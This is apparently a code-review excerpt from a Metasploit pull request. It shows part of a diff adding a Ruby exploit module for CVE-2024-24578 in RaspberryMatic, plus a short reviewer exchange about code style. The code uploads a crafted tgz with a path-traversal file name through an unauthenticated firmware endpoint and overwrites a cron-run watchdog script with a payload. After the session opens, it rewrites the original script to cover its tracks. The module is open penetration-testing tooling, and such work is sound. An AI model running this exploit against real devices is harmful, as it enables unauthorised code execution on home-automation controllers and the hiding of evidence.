modules/exploits/linux/http/raspberrymatic_unauth_rce_cve_2024_24578.rb

```diff
@@ -0,0 +1,186 @@
+
+    Rex::Text.gzip(tarfile.string)
+  end
+
+  # CVE-2024-24578: remote code execution via zip slip overwriting watchdog script
+  # affected components:
+  # web endpoint /pages/jpages/system/DeviceFirmware/addFirmware
+  # shell script /usr/local/addons/mediola/bin/watchdog
+  def execute_command(cmd, _opts = {})
+    # create malicious compressed tar file (tgz) to overwrite watchdog script
+    # with malicious payload triggering the RCE
+    fname = Rex::Text.rand_text_alphanumeric(8..12)
+    fpath = '../../../../../../../../../..//usr/local/addons/mediola/bin/watchdog'
+    payload_tgz = create_malicious_tgz(cmd, fpath)
+
+    # construct multipart form data
+    form_data = Rex::MIME::Message.new
+    form_data.add_part(payload_tgz, 'application/gzip', 'binary', "form-data; name=\"file\"; filename=\"#{fname}.tgz\"")
+
+    # upload the malicious tgz file
+    print_status("Uploading #{fname}.tgz")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'pages', 'jpages', 'system', 'DeviceFirmware', 'addFirmware'),
+      'ctype' => "multipart/form-data; boundary=#{form_data.bound}",
+      'data' => form_data.to_s
+    })
+    fail_with(Failure::NoAccess, "Upload #{fname}.tgz is not successful.") unless res&.code == 200 && res.body.include?('${addDevFirmwareInfoCorrupt}')
+    print_status('Waiting 5 minutes for watchdog execution via cron to trigger the RCE.')
+  end
+
+  def on_new_session(session)
+    # restore orginal watchdog script to cover our tracks
+    print_status('Restoring original watchdog script.')
+    if session.type == 'meterpreter'
+      session.sys.process.execute('/bin/sh', '-c "echo -ne \'#!/bin/sh\nif [ -e /etc/config/neoDisabled ];then\n\texit 0\nfi\n\n\' > /usr/local/addons/mediola/bin/watchdog"')
+      session.sys.process.execute('/bin/sh', '-c "echo -ne \'if [ -e /usr/local/addons/mediola/Disabled ];then\n\texit 0\nfi\n\n\' >> /usr/local/addons/mediola/bin/watchdog"')
+      session.sys.process.execute('/bin/sh', '-c "echo -ne \'PIDOFD=\$(pgrep -f \"neo_server.*automation.js\")\n\n\' >> /usr/local/addons/mediola/bin/watchdog"')
+      session.sys.process.execute('/bin/sh', '-c "echo -ne \'if [ -z \"\$PIDOFD\" ]; then\n\t/usr/local/etc/config/rc.d/97NeoServer start\nfi\n\' >> /usr/local/addons/mediola/bin/watchdog"')
+    else
+      session.shell_command_token("echo -ne '#!/bin/sh\nif [ -e /etc/config/neoDisabled ];then\n\texit 0\nfi\n\n' > /usr/local/addons/mediola/bin/watchdog")
+      session.shell_command_token("echo -ne 'if [ -e /usr/local/addons/mediola/Disabled ];then\n\texit 0\nfi\n\n' >> /usr/local/addons/mediola/bin/watchdog")
+      session.shell_command_token("echo -ne 'PIDOFD=$(pgrep -f \"neo_server.*automation.js\")\n\n' >> /usr/local/addons/mediola/bin/watchdog")
+      session.shell_command_token("echo -ne 'if [ -z \"$PIDOFD\" ]; then\n\t/usr/local/etc/config/rc.d/97NeoServer start\nfi\n' >> /usr/local/addons/mediola/bin/watchdog")
+    end
```

Comment:
Maybe use a list of commands with a `for` loop here to make things a bit more readable?

Reply:
well, it will be a bit of puzzle with backslash escapes. I rather keep as it is.